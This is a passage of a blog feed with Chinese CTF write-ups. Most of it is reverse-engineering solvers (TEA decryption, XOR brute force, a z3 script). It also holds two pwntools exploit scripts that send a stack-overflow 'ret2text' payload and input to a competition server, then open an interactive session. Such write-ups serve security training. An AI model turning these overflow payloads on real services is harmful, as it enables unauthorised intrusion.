class="hljs-number">4</span>) ^ (v1 >> <span class="hljs-number">5</span>)) + v1) ^ (sum + key[(sum & <span class="hljs-number">3</span>)]);<br> v1 -= (((v0 << <span class="hljs-number">4</span>) ^ (v0 >> <span class="hljs-number">5</span>)) + v0) ^ ((sum + key[((sum >> <span class="hljs-number">11</span>) & <span class="hljs-number">3</span>)]) ^ sum);<br> }<br> v[<span class="hljs-number">0</span>] = v0; v[<span class="hljs-number">1</span>] = v1;<br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"解密后的数据:%u %u\n"</span>, v[<span class="hljs-number">0</span>], v[<span class="hljs-number">1</span>]);<br>}<br><br><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span><br>{<br> <span class="hljs-type">uint32_t</span> v[<span class="hljs-number">38</span>] = { <span class="hljs-number">0x9AF9464B</span>, <span class="hljs-number">0xC417B89E</span>, <span class="hljs-number">0xB217A713</span>, <span class="hljs-number">0xC93BA9E8</span>, <span class="hljs-number">0x94F3E44E</span>, <span class="hljs-number">0xB5CC2AB5</span>, <span class="hljs-number">0x4451E42C</span>, <span class="hljs-number">0x7A8A289A</span>,<br> <span class="hljs-number">0x53C8D008</span>, <span class="hljs-number">0x6E117B49</span>, <span class="hljs-number">0x9BFFD794</span>, <span class="hljs-number">0x5EFF2DF9</span>, <span class="hljs-number">0x17E72531</span>, <span class="hljs-number">0xDFBD9979</span>, <span class="hljs-number">0x8F871B3A</span>, <span class="hljs-number">0x73E8C5AC</span>,<br> <span class="hljs-number">0xB28670A6</span>, <span class="hljs-number">0x5AF6A369</span>, <span class="hljs-number">0x2CF7DA24</span>, <span class="hljs-number">0x347B66AF</span>, <span class="hljs-number">0xB9C84D60</span>, <span class="hljs-number">0x911E912F</span>, <span class="hljs-number">0xBD5A2F9B</span>, <span class="hljs-number">0xCB96733A</span>,<br> <span class="hljs-number">0xC59968BE</span>, <span class="hljs-number">0xA00013E9</span>, <span class="hljs-number">0xC12F4EA4</span>, <span class="hljs-number">0xDE863A10</span>, <span class="hljs-number">0xA0C4D594</span>, <span class="hljs-number">0x4380983C</span>, <span class="hljs-number">0x7E2F7648</span>, <span class="hljs-number">0xE54DDC89</span>,<br> <span class="hljs-number">0x3F27A690</span>, <span class="hljs-number">0xB58D3199</span>, <span class="hljs-number">0x604AE517</span>, <span class="hljs-number">0x9C903984</span>, <span class="hljs-number">0xF4E04481</span>, <span class="hljs-number">0x3CF4EDFF</span> };<br> <span class="hljs-type">uint32_t</span> flag[<span class="hljs-number">2</span>] = {<span class="hljs-number">0x0</span>,<span class="hljs-number">0x0</span>};<br> <span class="hljs-type">uint32_t</span> pqw[<span class="hljs-number">2</span>] = { <span class="hljs-string">'S'</span>,<span class="hljs-string">'}'</span>};<br> <span class="hljs-type">uint32_t</span> <span class="hljs-type">const</span> k[<span class="hljs-number">4</span>] = { <span class="hljs-number">0x00000020</span>, <span class="hljs-number">0x0000001B</span>, <span class="hljs-number">0x00000027</span>, <span class="hljs-number">0x0000002C</span> };<br> <span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> i,r = <span class="hljs-number">54</span>;<span class="hljs-comment">//num_rounds建议取值为32</span><br> <span class="hljs-comment">// v为要加密的数据是两个32位无符号整数</span><br> <span class="hljs-comment">// k为加密解密密钥,为4个32位无符号整数,即密钥长度为128位</span><br> <span class="hljs-comment">//printf("加密前原始数据:%u %u\n", v[0],v[1]);</span><br> <span class="hljs-comment">//encipher(r, v, k);</span><br> <span class="hljs-comment">//printf("加密后的数据:%u %u\n", v[0], v[1]);</span><br> encipher(r, pqw, k);<br> <span class="hljs-keyword">for</span> (i = <span class="hljs-number">0</span>; i < <span class="hljs-number">38</span>; i+=<span class="hljs-number">2</span>)<br> {<br> flag[<span class="hljs-number">0</span>] = v[i];<br> flag[<span class="hljs-number">1</span>] = v[i + <span class="hljs-number">1</span>];<br> decipher(r, flag, k);<br><br> }<br> <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}<br></code></pre></td></tr></table></figure><p>经过测试,这样直接套用ida里的代码也是可以的</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-keyword">for</span> (i = <span class="hljs-number">0</span>; i < num_rounds; i++) {<br>v1 += sum ^ (*(key + <span class="hljs-number">1</span> * ((sum >> <span class="hljs-number">11</span>) & <span class="hljs-number">3</span>)) + sum) ^ (v0 + ((v0 >> <span class="hljs-number">5</span>) ^ (<span class="hljs-number">16</span> * v0)));<br>v0 += (*(key + <span class="hljs-number">1</span> * (sum & <span class="hljs-number">3</span>)) + sum) ^ (v1 + ((v1 >> <span class="hljs-number">5</span>) ^ (<span class="hljs-number">16</span> * v1)));<br>sum += <span class="hljs-number">0x31415927</span>;<br>}<br>v[<span class="hljs-number">0</span>] = v0; v[<span class="hljs-number">1</span>] = v1;<br><span class="hljs-built_in">printf</span>(<span class="hljs-string">"加密后的数据:%u %u\n"</span>, v[<span class="hljs-number">0</span>], v[<span class="hljs-number">1</span>]);<br></code></pre></td></tr></table></figure><h2 id="浪漫至死不渝"><a href="#浪漫至死不渝" class="headerlink" title="浪漫至死不渝"></a>浪漫至死不渝</h2><p>已知加密后的数据以及密钥,直接爆破就好了</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdint.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span><span class="hljs-string"><string.h></span></span><br><br><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span><br>{<br> <span class="hljs-type">int</span> enc[]={ <span class="hljs-number">125</span>, <span class="hljs-number">130</span>, <span class="hljs-number">131</span>, <span class="hljs-number">122</span>, <span class="hljs-number">117</span>, <span class="hljs-number">110</span>, <span class="hljs-number">123</span>, <span class="hljs-number">125</span>, <span class="hljs-number">130</span>, <span class="hljs-number">131</span>, <span class="hljs-number">122</span>, <span class="hljs-number">117</span>, <span class="hljs-number">110</span>, <span class="hljs-number">123</span>, <span class="hljs-number">99</span>, <span class="hljs-number">99</span>, <span class="hljs-number">99</span>, <span class="hljs-number">99</span> };<br> <span class="hljs-type">int</span> key[] = { <span class="hljs-string">'5'</span>,<span class="hljs-string">'2'</span>,<span class="hljs-string">'0'</span>,<span class="hljs-string">'1'</span>,<span class="hljs-string">'3'</span>,<span class="hljs-string">'1'</span>,<span class="hljs-string">'4'</span>,<span class="hljs-string">'W'</span>,<span class="hljs-string">'X'</span>,<span class="hljs-string">'H'</span>,<span class="hljs-string">'N'</span> };<br> <span class="hljs-type">int</span> i, j, k;<br> <span class="hljs-keyword">for</span> (i = <span class="hljs-number">14</span>; i < <span class="hljs-number">18</span>; i++)<br> {<br> <span class="hljs-keyword">for</span> (j = <span class="hljs-number">33</span>; j < <span class="hljs-number">126</span>; j++)<br> {<br> k = j;<br> k = j ^ key[i - <span class="hljs-number">7</span>];<br> k += <span class="hljs-number">99</span>;<br> <span class="hljs-keyword">if</span> (k == enc[i])<br> {<br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"%c "</span>, j);<br> }<br> }<br> }<br><br><br> <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}<br></code></pre></td></tr></table></figure><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdint.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span><span class="hljs-string"><string.h></span></span><br><br><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span><br>{<br> <span class="hljs-type">int</span> enc[]={ <span class="hljs-number">125</span>, <span class="hljs-number">130</span>, <span class="hljs-number">131</span>, <span class="hljs-number">122</span>, <span class="hljs-number">117</span>, <span class="hljs-number">110</span>, <span class="hljs-number">123</span>, <span class="hljs-number">125</span>, <span class="hljs-number">130</span>, <span class="hljs-number">131</span>, <span class="hljs-number">122</span>, <span class="hljs-number">117</span>, <span class="hljs-number">110</span>, <span class="hljs-number">123</span>, <span class="hljs-number">99</span>, <span class="hljs-number">99</span>, <span class="hljs-number">99</span>, <span class="hljs-number">99</span> };<br> <span class="hljs-type">int</span> key[] = { <span class="hljs-string">'5'</span>,<span class="hljs-string">'2'</span>,<span class="hljs-string">'0'</span>,<span class="hljs-string">'1'</span>,<span class="hljs-string">'3'</span>,<span class="hljs-string">'1'</span>,<span class="hljs-string">'4'</span>,<span class="hljs-string">'W'</span>,<span class="hljs-string">'X'</span>,<span class="hljs-string">'H'</span>,<span class="hljs-string">'N'</span> };<br> <span class="hljs-type">int</span> i, j, k;<br> <span class="hljs-keyword">for</span> (i = <span class="hljs-number">0</span>; i < <span class="hljs-number">14</span>; i++)<br> {<br> <span class="hljs-keyword">for</span> (j = <span class="hljs-number">33</span>; j < <span class="hljs-number">126</span>; j++)<br> {<br> k = j;<br> k = j ^ key[i % <span class="hljs-number">7</span>];<br> k += <span class="hljs-number">10</span>;<br> <span class="hljs-keyword">if</span> (k == enc[i])<br> {<br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"%c "</span>, j);<br> }<br> }<br> }<br><br><br> <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}<br></code></pre></td></tr></table></figure><h2 id="easymath"><a href="#easymath" class="headerlink" title="easymath"></a>easymath</h2><p>做不了一点</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> z3 <span class="hljs-keyword">import</span> * <br><br>solver = Solver()<br><br>charset = <span class="hljs-string">"01234_asdzxcpoityumnbAOZWXGMY"</span><br><br>flag = [BitVec(<span class="hljs-string">'f%d'</span>%i, <span class="hljs-number">8</span>) <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">26</span>)]<br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">26</span>):<br> solver.add(Or([flag[i] == <span class="hljs-built_in">ord</span>(c) <span class="hljs-keyword">for</span> c <span class="hljs-keyword">in</span> charset]))<br> <br>matrix = [<span class="hljs-number">0x12</span>, <span class="hljs-number">0x1D</span>, <span class="hljs-number">0x10</span>, <span class="hljs-number">0x13</span>, <span class="hljs-number">0x1B</span>, <span class="hljs-number">0x08</span>, <span class="hljs-number">0x1F</span>, <span class="hljs-number">0x08</span>, <span class="hljs-number">0x17</span>, <span class="hljs-number">0x1E</span>, <span class="hljs-number">0x1D</span>, <span class="hljs-number">0x03</span>, <span class="hljs-number">0x1C</span>, <span class="hljs-number">0x0A</span>, <span class="hljs-number">0x15</span>, <span class="hljs-number">0x12</span>, <span class="hljs-number">0x1D</span>, <span class="hljs-number">0x08</span>, <span class="hljs-number">0x10</span>, <span class="hljs-number">0x1C</span>, <span class="hljs-number">0x0B</span>, <span class="hljs-number">0x1E</span>, <span class="hljs-number">0x07</span>, <span class="hljs-number">0x14</span>, <span class="hljs-number">0x07</span>]<br><br>v7 = [[BitVec(<span class="hljs-string">'v%d_%d'</span>%(i,j), <span class="hljs-number">8</span>) <span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">5</span>)] <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">5</span>)]<br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">5</span>):<br> <span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">5</span>):<br> <span class="hljs-keyword">for</span> k <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">5</span>):<br> v7[i][j] = v7[i][j] + flag[<span class="hljs-number">5</span>*i+k] * matrix[<span class="hljs-number">5</span>*k+j]<br> v7[i][j] = v7[i][j] & <span class="hljs-number">0x1F</span><br><br><span class="hljs-comment"># 对角线等于1 </span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">5</span>):<br> solver.add(v7[i][i] == <span class="hljs-number">1</span>)<br> <br><span class="hljs-comment"># 非对角线等于0</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">5</span>):<br> <span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">5</span>):<br> <span class="hljs-keyword">if</span> i != j:<br> solver.add(v7[i][j] == <span class="hljs-number">0</span>)<br><br><span class="hljs-comment"># 特定字节等于要求值 </span><br>solver.add(flag[<span class="hljs-number">1</span>] == <span class="hljs-built_in">ord</span>(<span class="hljs-string">'t'</span>))<br>solver.add(flag[<span class="hljs-number">7</span>] == <span class="hljs-built_in">ord</span>(<span class="hljs-string">'y'</span>)) <br>solver.add(flag[<span class="hljs-number">17</span>] == <span class="hljs-built_in">ord</span>(<span class="hljs-string">'y'</span>))<br><br><span class="hljs-keyword">if</span> solver.check() == sat:<br> m = solver.model()<br> res = []<br> <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">26</span>):<br> res.append(m[flag[i]].as_long())<br> <span class="hljs-built_in">print</span>(<span class="hljs-built_in">bytes</span>(res).decode())<br><span class="hljs-keyword">else</span>:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">"No solution found"</span>)<br></code></pre></td></tr></table></figure><h2 id="mySelf"><a href="#mySelf" class="headerlink" title="mySelf"></a>mySelf</h2><p>对比着他的算法,抄过来就可以了,一开始是个SMC,我们需要绕过一下,然后恢复函数</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdint.h></span></span><br><br><span class="hljs-comment">/* take 64 bits of data in v[0] and v[1] and 128 bits of key[0] - key[3] */</span><br><br><span class="hljs-type">void</span> <span class="hljs-title function_">encipher</span><span class="hljs-params">(<span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> num_rounds, <span class="hljs-type">uint32_t</span> v[<span class="hljs-number">2</span>])</span> {<br> <span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> i;<br> <span class="hljs-type">uint32_t</span> v0 = v[<span class="hljs-number">0</span>], v1 = v[<span class="hljs-number">1</span>], sum = <span class="hljs-number">0</span>, delta = <span class="hljs-number">1640531527</span>;<br> <span class="hljs-keyword">for</span> (i = <span class="hljs-number">0</span>; i < num_rounds; i++) {<br> sum -= <span class="hljs-number">1640531527</span>;<br> v1 += ((v0 >> <span class="hljs-number">5</span>) + <span class="hljs-number">2</span>) ^ ((<span class="hljs-number">16</span> * v0) + <span class="hljs-number">2</span>) ^ (sum + v0);<br> v0 += ((v1 >> <span class="hljs-number">5</span>) + <span class="hljs-number">4</span>) ^ ((<span class="hljs-number">16</span> * v1) + <span class="hljs-number">3</span>) ^ (sum + v1);<br> }<br> v[<span class="hljs-number">0</span>] = v0; v[<span class="hljs-number">1</span>] = v1;<br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"加密后的数据:%u %u\n"</span>, v[<span class="hljs-number">0</span>], v[<span class="hljs-number">1</span>]);<br>}<br><br><span class="hljs-type">void</span> <span class="hljs-title function_">decipher</span><span class="hljs-params">(<span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> num_rounds, <span class="hljs-type">uint32_t</span> v[<span class="hljs-number">2</span>])</span> {<br> <span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> v0 = v[<span class="hljs-number">0</span>], v1 = v[<span class="hljs-number">1</span>], delta = <span class="hljs-number">1640531527</span>;<br> <span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> i, sum = -(<span class="hljs-number">1640531527</span> * <span class="hljs-number">32</span>);<br> <span class="hljs-keyword">for</span> (i = <span class="hljs-number">0</span>; i < <span class="hljs-number">32</span>; i++) {<br> <br> v1 -= ((v0 >> <span class="hljs-number">5</span>) + <span class="hljs-number">4</span>) ^ ((<span class="hljs-number">16</span> * v0) + <span class="hljs-number">3</span>) ^ (sum + v0);<br> v0 -= ((v1 >> <span class="hljs-number">5</span>) + <span class="hljs-number">2</span>) ^ ((<span class="hljs-number">16</span> * v1) + <span class="hljs-number">2</span>) ^ (sum + v1);<br> sum += <span class="hljs-number">1640531527</span>;<br> }<br> v[<span class="hljs-number">0</span>] = v0; v[<span class="hljs-number">1</span>] = v1;<br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"解密后的数据:%x %x\n"</span>, v[<span class="hljs-number">0</span>], v[<span class="hljs-number">1</span>]);<br>}<br><br><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span><br>{<br> <span class="hljs-type">uint32_t</span> v[<span class="hljs-number">8</span>] = { <span class="hljs-number">0xBDBDF9F0</span>, <span class="hljs-number">0xE26194C4</span>, <span class="hljs-number">0x80799125</span>, <span class="hljs-number">0x1F0FC219</span>, <span class="hljs-number">0xEB6A1815</span>, <span class="hljs-number">0x84F572C5</span>, <span class="hljs-number">0x40CC3A85</span>, <span class="hljs-number">0xD2A32ABB</span> };<br> <span class="hljs-type">uint32_t</span> flag[<span class="hljs-number">2</span>] = { <span class="hljs-number">0x0</span>,<span class="hljs-number">0x0</span> };<br> <span class="hljs-type">uint32_t</span> pqw[<span class="hljs-number">2</span>] = { <span class="hljs-string">'S'</span>,<span class="hljs-string">'Y'</span> };<br> <span class="hljs-type">uint32_t</span> <span class="hljs-type">const</span> k[<span class="hljs-number">4</span>] = { <span class="hljs-number">0x00000020</span>, <span class="hljs-number">0x0000001B</span>, <span class="hljs-number">0x00000027</span>, <span class="hljs-number">0x0000002C</span> };<br> <span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> i, r = <span class="hljs-number">32</span>;<span class="hljs-comment">//num_rounds建议取值为32</span><br> <span class="hljs-comment">// v为要加密的数据是两个32位无符号整数</span><br> <span class="hljs-comment">// k为加密解密密钥,为4个32位无符号整数,即密钥长度为128位</span><br> <span class="hljs-comment">//printf("加密前原始数据:%u %u\n", v[0],v[1]);</span><br> <span class="hljs-comment">//encipher(r, v, k);</span><br> <span class="hljs-comment">//printf("加密后的数据:%u %u\n", v[0], v[1]);</span><br> <br> <span class="hljs-keyword">for</span> (i = <span class="hljs-number">0</span>; i < <span class="hljs-number">8</span>; i += <span class="hljs-number">2</span>)<br> {<br> flag[<span class="hljs-number">0</span>] = v[i];<br> flag[<span class="hljs-number">1</span>] = v[i + <span class="hljs-number">1</span>];<br> <span class="hljs-comment">// encipher(r, flag);</span><br> decipher(r, flag);<br><br> }<br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"%c"</span>, <span class="hljs-number">2157182970</span>);<br> <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}<br></code></pre></td></tr></table></figure>]]></content>
<summary type="html"><h4 id="PWN1"><a href="#PWN1" class="headerlink" title="PWN1"></a>PWN1</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-comment"># p = process(&#x27;./ezshellcode&#x27;)</span><br>p = remote(<span class="hljs-string">&#x27;pwn.node.game.sycsec.com&#x27;</span>,<span class="hljs-number">30213</span>)<br>context(arch=<span class="hljs-string">&#x27;amd64&#x27;</span>, os=<span class="hljs-string">&#x27;linux&#x27;</span>)<br>context.log_level = <span class="hljs-string">&#x27;DEBUG&#x27;</span><br><br><br><br>p.recvuntil(<span class="hljs-string">b&#x27;my heart&#x27;</span>)<br>p.sendline(<span class="hljs-string">b&#x27;aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaSyclover&#x27;</span>)<br><br>p.recvuntil(<span class="hljs-string">b&#x27;challege!&#x27;</span>)<br>p.recvline()<br>p.recvline()<br>a=p.recvline().decode(<span class="hljs-string">&#x27;utf-8&#x27;</span>)<br>a = a[<span class="hljs-number">0</span>:-<span class="hljs-number">3</span>]<br><span class="hljs-built_in">print</span>(<span class="hljs-number">6666666666</span>)<br><span class="hljs-built_in">print</span>(a)<br>r = <span class="hljs-built_in">eval</span>(a)<br>p.sendline(<span class="hljs-built_in">str</span>(r))<br>p.interactive()<br></code></pre></td></tr></table></figure>
<h2 id="ret2text"><a href="#ret2text" class="headerlink" title="ret2text"></a>ret2text</h2><p>PIE手动爆破,填充数据不是0x50</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br>context.log_level = <span class="hljs-string">&#x27;debug&#x27;</span><br><br><span class="hljs-comment"># context.terminal = [&#x27;gnome-terminal&#x27;, &#x27;-x&#x27;, &#x27;sh&#x27;, &#x27;-c&#x27;]</span><br><span class="hljs-comment"># r = gdb.debug(&#x27;./ret2text&#x27;)</span><br><span class="hljs-comment"># r = process(&#x27;./ret2text&#x27;)</span><br><br>r = remote(<span class="hljs-string">&#x27;pwn.node.game.sycsec.com&#x27;</span>,<span class="hljs-number">31949</span>)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">debug</span>():<br> gdb.attach(r)<br> pause()<br>elf = ELF(<span class="hljs-string">&#x27;ret2text&#x27;</span>)<br>se = <span class="hljs-keyword">lambda</span> data :r.send(data)<br>sa = <span class="hljs-keyword">lambda</span> delim,data :r.sendafter(delim, data)<br>sl = <span class="hljs-keyword">lambda</span> data :r.sendline(data)<br>sla = <span class="hljs-keyword">lambda</span> delim,data :r.sendlineafter(delim, data)<br>sea = <span class="hljs-keyword">lambda</span> delim,data :r.sendafter(delim, data)<br>rc = <span class="hljs-keyword">lambda</span> numb=<span class="hljs-number">4096</span> :r.recv(numb)<br>rl = <span class="hljs-keyword">lambda</span> :r.recvline()<br>ru = <span class="hljs-keyword">lambda</span> delims :r.recvuntil(delims)<br>uu32 = <span class="hljs-keyword">lambda</span> data :u32(data.ljust(<span class="hljs-number">4</span>, <span class="hljs-string">b&#x27;\0&#x27;</span>))<br>uu64 = <span class="hljs-keyword">lambda</span> data :u64(data.ljust(<span class="hljs-number">8</span>, <span class="hljs-string">b&#x27;\0&#x27;</span>))<br>lic = <span class="hljs-keyword">lambda</span> data :uu64(ru(data)[-<span class="hljs-number">6</span>:])<br>padding = <span class="hljs-keyword">lambda</span> lenth :<span class="hljs-string">b&#x27;Yhuan&#x27;</span>*(lenth//<span class="hljs-number">5</span>)+<span class="hljs-string">b&#x27;Y&#x27;</span>*(lenth % <span class="hljs-number">5</span>)<br>it = <span class="hljs-keyword">lambda</span> :r.interactive()<br><br>pad = p64(<span class="hljs-number">0</span>)*<span class="hljs-number">9</span> + p64(<span class="hljs-number">1</span>)<br>backdoor = <span class="hljs-string">b&#x27;\x27\xA2&#x27;</span><br><br>pl1 = pad + p64(<span class="hljs-number">0</span>) + backdoor<br>se(pl1)<br><br>r.interactive()<br></code></pre></td></tr></table></figure></summary>
</entry>
<entry>
<title>SHCTF</title>
<link href="https://shenshuoyaoyouguangha.github.io/2023/10/02/SHCTF/"/>
<id>https://shenshuoyaoyouguangha.github.io/2023/10/02/SHCTF/</id>
<published>2023-10-02T10:19:44.000Z</published>
<updated>2023-12-18T05:33:29.883Z</updated>
<content type="html"><![CDATA[<h2 id="RE"><a href="#RE" class="headerlink" title="RE"></a>RE</h2><h3 id="WEEK1-ez-asm"><a href="#WEEK1-ez-asm" class="headerlink" title="[WEEK1]ez_asm"></a>[WEEK1]ez_asm</h3><p>简单的asm代码,直接对照的逻辑逆向即可</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs python">flag = <span class="hljs-string">"nhuo[M`7mc7uhc$7midgbTf`7`$7%#ubf7 ci5Y"</span> <br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(flag)):<br> <br> c = flag[i] <br> c = <span class="hljs-built_in">ord</span>(c)+<span class="hljs-number">0xA</span><br> flag = 